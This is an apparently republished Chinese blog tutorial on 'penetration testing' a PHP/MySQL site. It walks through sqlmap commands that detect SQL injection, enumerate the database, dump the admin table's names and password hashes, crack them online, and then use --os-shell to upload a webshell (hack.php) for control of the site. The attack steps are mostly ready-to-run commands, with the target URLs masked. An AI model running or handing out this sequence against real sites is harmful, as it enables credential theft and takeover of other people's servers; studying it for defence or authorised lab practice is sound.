環(huán)境:對某網(wǎng)站進行滲透測試。
(PHP+Mysql開發(fā)的網(wǎng)站,用于WEB漏洞教學和檢測的)
工具:sqlmap(Kali Linux中自帶or官網(wǎng)下載Windows版)
此次實驗所涉及的sqlmap參數(shù):

一、信息收集

二、漏洞挖掘
(1)判斷網(wǎng)站是否存在sql注入漏洞
使用工具,sqlmap:sqlmap -u "目標網(wǎng)站地址" --batch

(2)存在 sql注入漏洞,
使用sqlmap進行sql注入,并獲取后臺管理員的賬號和密碼。
1、先跑出當前網(wǎng)站所使用的數(shù)據(jù)庫庫名
(sqlmap -u "http://*********/product.php?cid=4" --current-db)

當前數(shù)據(jù)庫:’510cms‘。
2、求當前數(shù)據(jù)庫下所有表名
(sqlmap -u "http://*************/product.php?cid=4" -D 510cms --tables)

3、求指定表內(nèi)列名
(sqlmap -u "http://***********/product.php?cid=4" -D 510cms -T 510_admin --columns)

4、求指定列名的字段
(sqlmap -u "http://*********/product.php?cid=4" -D 510cms -T 510_admin -C name,passwd --dump)

三、獲取賬戶密碼后就可以登錄網(wǎng)站后臺()
(1)使用md5在線解密破解密碼
獲取弱口令

(2)找到后臺地址就可以登錄了

(3)如何獲取網(wǎng)站后臺地址(參考之前的一篇)
(223條消息) 滲透測試中的信息收集(使用相關工具,收集網(wǎng)站的子域名,掃描網(wǎng)站的后臺地址)_net1996的博客-CSDN博客
四、攻擊網(wǎng)站,利用sqlmap上傳大馬,可以對網(wǎng)站進行后臺操作
(1)
(sqlmap -u "http://************/product.php?cid=4" --os-shell)
四個選項:文章來源:http://www.zghlxwxcb.cn/news/detail-613166.html


(2)進入如上網(wǎng)站,上傳自己準備的大馬(hack.php)

(3)上傳成功后,在網(wǎng)站原址后加上/hack.php即可進入操作界面
(http://***********/hack.php)密碼在大馬文件中有。文章來源地址http://www.zghlxwxcb.cn/news/detail-613166.html

到了這里,關于滲透測試模擬(使用sqlmap進行sql注入漏洞判斷,利用該漏洞進行掛馬)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網(wǎng)!